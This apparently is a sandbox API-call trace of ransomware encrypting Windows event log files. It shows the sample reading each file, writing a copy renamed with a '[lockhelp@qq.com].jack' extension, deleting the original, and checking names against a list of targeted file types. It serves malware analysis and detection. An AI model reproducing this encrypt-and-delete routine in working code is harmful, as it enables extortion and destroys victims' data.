[0206.291] WriteFile (in: hFile=0x3dc, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x142, lpOverlapped=0x0) returned 1 [0206.291] SetEndOfFile (hFile=0x3dc) returned 1 [0206.291] CloseHandle (hObject=0x3dc) returned 1 [0206.295] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0206.295] SetEndOfFile (hFile=0x404) returned 1 [0206.296] CloseHandle (hObject=0x404) returned 1 [0206.296] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0206.296] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx")) returned 1 [0206.297] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0206.297] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0206.297] lstrlenW (lpString=".doc") returned 4 [0206.297] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0206.297] lstrlenW (lpString=".docx") returned 5 [0206.297] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0206.297] lstrlenW (lpString=".pdf") returned 4 [0206.297] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0206.297] lstrlenW (lpString=".xls") returned 4 [0206.297] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0206.297] lstrlenW (lpString=".xlsx") returned 5 [0206.297] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0206.297] lstrlenW (lpString=".ppt") returned 4 [0206.297] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0206.297] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0206.297] lstrlenW (lpString=".zip") returned 4 [0206.297] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0206.297] lstrlenW (lpString=".rar") returned 4 [0206.297] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0206.298] lstrlenW (lpString=".bz2") returned 4 [0206.298] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0206.298] lstrlenW (lpString=".7z") returned 3 [0206.298] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0206.298] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0206.298] lstrlenW (lpString=".dbf") returned 4 [0206.298] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0206.298] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0206.298] lstrlenW (lpString=".1cd") returned 4 [0206.298] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0206.298] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0206.298] lstrlenW (lpString=".jpg") returned 4 [0206.298] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0206.298] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0206.298] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0206.298] lstrlenW (lpString=".doc") returned 4 [0206.298] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0206.298] lstrlenW (lpString=".docx") returned 5 [0206.298] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0206.298] lstrlenW (lpString=".pdf") returned 4 [0206.298] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0206.298] lstrlenW (lpString=".xls") returned 4 [0206.298] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0206.298] lstrlenW (lpString=".xlsx") returned 5 [0206.298] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0206.299] lstrlenW (lpString=".ppt") returned 4 [0206.299] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0206.299] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0206.299] lstrlenW (lpString=".zip") returned 4 [0206.299] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0206.299] lstrlenW (lpString=".rar") returned 4 [0206.299] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0206.299] lstrlenW (lpString=".bz2") returned 4 [0206.299] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0206.299] lstrlenW (lpString=".7z") returned 3 [0206.299] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0206.299] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0206.299] lstrlenW (lpString=".dbf") returned 4 [0206.299] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0206.299] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0206.299] lstrlenW (lpString=".1cd") returned 4 [0206.299] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0206.299] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 63 [0206.299] lstrlenW (lpString=".jpg") returned 4 [0206.300] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0206.300] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0206.300] lstrlenW (lpString="Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 49 [0206.300] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0206.300] GetFileSizeEx (in: hFile=0x404, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=69632) returned 1 [0206.300] CloseHandle (hObject=0x404) returned 1 [0206.300] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx")) returned 0x20 [0206.300] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0206.300] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0206.301] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0206.301] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0206.301] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0206.301] GetLastError () returned 0x0 [0206.301] ReadFile (in: hFile=0x404, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0206.304] WriteFile (in: hFile=0x3dc, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0206.306] ReadFile (in: hFile=0x404, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0206.306] WriteFile (in: hFile=0x3dc, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x136, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x136, lpOverlapped=0x0) returned 1 [0206.306] SetEndOfFile (hFile=0x3dc) returned 1 [0206.306] CloseHandle (hObject=0x3dc) returned 1 [0206.334] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0206.334] SetEndOfFile (hFile=0x404) returned 1 [0207.121] CloseHandle (hObject=0x404) returned 1 [0207.122] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0207.122] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx")) returned 1 [0207.180] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0207.180] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0207.180] lstrlenW (lpString=".doc") returned 4 [0207.180] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.180] lstrlenW (lpString=".docx") returned 5 [0207.180] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.180] lstrlenW (lpString=".pdf") returned 4 [0207.180] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.181] lstrlenW (lpString=".xls") returned 4 [0207.181] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.181] lstrlenW (lpString=".xlsx") returned 5 [0207.181] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.181] lstrlenW (lpString=".ppt") returned 4 [0207.181] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.181] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0207.181] lstrlenW (lpString=".zip") returned 4 [0207.181] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.181] lstrlenW (lpString=".rar") returned 4 [0207.181] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.181] lstrlenW (lpString=".bz2") returned 4 [0207.181] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.181] lstrlenW (lpString=".7z") returned 3 [0207.181] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.181] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0207.181] lstrlenW (lpString=".dbf") returned 4 [0207.181] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.181] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0207.181] lstrlenW (lpString=".1cd") returned 4 [0207.181] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.181] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0207.181] lstrlenW (lpString=".jpg") returned 4 [0207.181] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.181] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0207.181] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0207.181] lstrlenW (lpString=".doc") returned 4 [0207.182] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.182] lstrlenW (lpString=".docx") returned 5 [0207.182] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.182] lstrlenW (lpString=".pdf") returned 4 [0207.182] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.182] lstrlenW (lpString=".xls") returned 4 [0207.182] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.182] lstrlenW (lpString=".xlsx") returned 5 [0207.182] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.182] lstrlenW (lpString=".ppt") returned 4 [0207.182] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.182] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0207.182] lstrlenW (lpString=".zip") returned 4 [0207.182] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.182] lstrlenW (lpString=".rar") returned 4 [0207.182] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.182] lstrlenW (lpString=".bz2") returned 4 [0207.182] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.182] lstrlenW (lpString=".7z") returned 3 [0207.182] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.182] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0207.182] lstrlenW (lpString=".dbf") returned 4 [0207.182] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.182] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0207.182] lstrlenW (lpString=".1cd") returned 4 [0207.182] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.182] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 57 [0207.182] lstrlenW (lpString=".jpg") returned 4 [0207.183] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.183] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0207.183] lstrlenW (lpString="Microsoft-Windows-Bits-Client%4Operational.evtx") returned 47 [0207.183] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0207.186] GetFileSizeEx (in: hFile=0x404, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=69632) returned 1 [0207.186] CloseHandle (hObject=0x404) returned 1 [0207.186] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx")) returned 0x20 [0207.186] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.188] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0207.188] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0207.188] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0207.188] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0207.188] GetLastError () returned 0x0 [0207.188] ReadFile (in: hFile=0x424, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0207.206] WriteFile (in: hFile=0x3ec, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0207.209] ReadFile (in: hFile=0x424, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0207.209] WriteFile (in: hFile=0x3ec, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x132, lpOverlapped=0x0) returned 1 [0207.209] SetEndOfFile (hFile=0x3ec) returned 1 [0207.209] CloseHandle (hObject=0x3ec) returned 1 [0207.217] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0207.217] SetEndOfFile (hFile=0x424) returned 1 [0207.219] CloseHandle (hObject=0x424) returned 1 [0207.219] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0207.219] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx")) returned 1 [0207.219] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0207.219] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0207.219] lstrlenW (lpString=".doc") returned 4 [0207.220] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.220] lstrlenW (lpString=".docx") returned 5 [0207.220] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.220] lstrlenW (lpString=".pdf") returned 4 [0207.220] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.220] lstrlenW (lpString=".xls") returned 4 [0207.220] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.220] lstrlenW (lpString=".xlsx") returned 5 [0207.220] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.220] lstrlenW (lpString=".ppt") returned 4 [0207.220] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.220] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0207.220] lstrlenW (lpString=".zip") returned 4 [0207.220] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.220] lstrlenW (lpString=".rar") returned 4 [0207.220] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.220] lstrlenW (lpString=".bz2") returned 4 [0207.220] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.220] lstrlenW (lpString=".7z") returned 3 [0207.220] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.220] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0207.220] lstrlenW (lpString=".dbf") returned 4 [0207.220] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.220] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0207.221] lstrlenW (lpString=".1cd") returned 4 [0207.221] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.221] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0207.221] lstrlenW (lpString=".jpg") returned 4 [0207.221] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.221] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0207.221] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0207.221] lstrlenW (lpString=".doc") returned 4 [0207.221] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.221] lstrlenW (lpString=".docx") returned 5 [0207.221] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.221] lstrlenW (lpString=".pdf") returned 4 [0207.221] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.221] lstrlenW (lpString=".xls") returned 4 [0207.221] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.221] lstrlenW (lpString=".xlsx") returned 5 [0207.221] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.221] lstrlenW (lpString=".ppt") returned 4 [0207.221] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.221] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0207.221] lstrlenW (lpString=".zip") returned 4 [0207.221] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.221] lstrlenW (lpString=".rar") returned 4 [0207.221] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.221] lstrlenW (lpString=".bz2") returned 4 [0207.221] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.221] lstrlenW (lpString=".7z") returned 3 [0207.221] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.222] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0207.222] lstrlenW (lpString=".dbf") returned 4 [0207.222] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.222] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0207.222] lstrlenW (lpString=".1cd") returned 4 [0207.222] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.222] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 55 [0207.222] lstrlenW (lpString=".jpg") returned 4 [0207.222] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.222] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0207.222] lstrlenW (lpString="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 63 [0207.222] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0207.222] GetFileSizeEx (in: hFile=0x424, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=69632) returned 1 [0207.223] CloseHandle (hObject=0x424) returned 1 [0207.223] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx")) returned 0x20 [0207.223] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.223] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0207.223] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0207.223] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0207.223] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0207.224] GetLastError () returned 0x0 [0207.224] ReadFile (in: hFile=0x424, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0207.243] WriteFile (in: hFile=0x3ec, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0207.245] ReadFile (in: hFile=0x424, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0207.245] WriteFile (in: hFile=0x3ec, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x152, lpOverlapped=0x0) returned 1 [0207.245] SetEndOfFile (hFile=0x3ec) returned 1 [0207.245] CloseHandle (hObject=0x3ec) returned 1 [0207.248] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0207.248] SetEndOfFile (hFile=0x424) returned 1 [0207.253] CloseHandle (hObject=0x424) returned 1 [0207.254] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0207.254] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx")) returned 1 [0207.254] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0207.254] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 71 [0207.254] lstrlenW (lpString=".doc") returned 4 [0207.254] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.254] lstrlenW (lpString=".docx") returned 5 [0207.254] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.254] lstrlenW (lpString=".pdf") returned 4 [0207.254] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.254] lstrlenW (lpString=".xls") returned 4 [0207.255] lstrcmpiW (lpString1=".xls", lpString2="evtx") 